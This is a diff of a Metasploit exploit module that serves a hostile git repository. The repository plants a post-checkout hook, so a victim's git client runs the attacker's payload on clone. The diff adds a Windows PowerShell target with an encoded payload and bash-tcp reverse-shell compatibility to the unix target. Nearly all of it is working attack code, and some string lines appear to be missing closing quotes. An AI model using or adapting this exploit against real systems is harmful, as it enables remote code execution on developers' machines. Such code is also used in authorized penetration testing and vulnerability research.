@@ -9,6 +9,7 @@ class Metasploit4 < Msf::Exploit::Remote
99 Rank = ExcellentRanking
1010
1111 include Msf ::Exploit ::Remote ::HttpServer
12+ include Msf ::Exploit ::Powershell
1213
1314 def initialize ( info = { } )
1415 super ( update_info (
@@ -53,24 +54,28 @@ def initialize(info = {})
5354
5455 ] ,
5556 'DisclosureDate' => 'Dec 18 2014' ,
56- # TODO: correct all of this
57- 'Payload' =>
58- {
59- 'Compat' =>
60- {
61- 'PayloadType' => 'cmd' ,
62- 'RequiredCmd' => 'generic perl bash'
63- } ,
64- 'EncoderType' => Msf ::Encoder ::Type ::Raw
65- } ,
66- 'Platform' => %w( osx win ) ,
67- 'Targets' =>
57+ 'Targets' =>
6858 [
6959 [
7060 'Automatic' ,
7161 {
7262 'Platform' => [ 'unix' ] ,
73- 'Arch' => ARCH_CMD
63+ 'Arch' => ARCH_CMD ,
64+ 'Payload' =>
65+ {
66+ 'Compat' =>
67+ {
68+ 'PayloadType' => 'cmd cmd_bash' ,
69+ 'RequiredCmd' => 'generic bash-tcp'
70+ } ,
71+ }
72+ }
73+ ] ,
74+ [
75+ 'Windows Powershell' ,
76+ {
77+ 'Platform' => [ 'windows' ] ,
78+ 'Arch' => [ ARCH_X86 , ARCH_X86_64 ]
7479 }
7580 ]
7681 ] ,
@@ -102,6 +107,8 @@ def setup
102107 end
103108 setup_git unless git_uri . blank?
104109 setup_mercurial unless mercurial_uri . blank?
110+
111+ super
105112 end
106113
107114 def setup_git
@@ -120,7 +127,17 @@ def setup_git
120127 # .git/hooks/post-checkout and will subsequently execute commands of our
121128 # choosing upon cloning
122129 # build the hook file blob
123- full_cmd = "#!/bin/sh\n #{ payload . encoded } \n "
130+ case target . name
131+ when 'Automatic'
132+ full_cmd = "#!/bin/sh\n #{ payload . encoded } \n "
133+ when 'Windows Powershell'
134+ psh = cmd_psh_payload ( payload . encoded ,
135+ payload_instance . arch . first ,
136+ remove_comspec : true ,
137+ encode_final_payload : true )
138+ full_cmd = "#!/bin/sh\n #{ psh }
139+ end
140+
124141 sha1 , content = build_object ( 'blob' , full_cmd )
125142 trigger = "/objects/#{ get_path ( sha1 ) }
126143 @repo_data [ :git ] [ :trigger ] = trigger
0 commit comments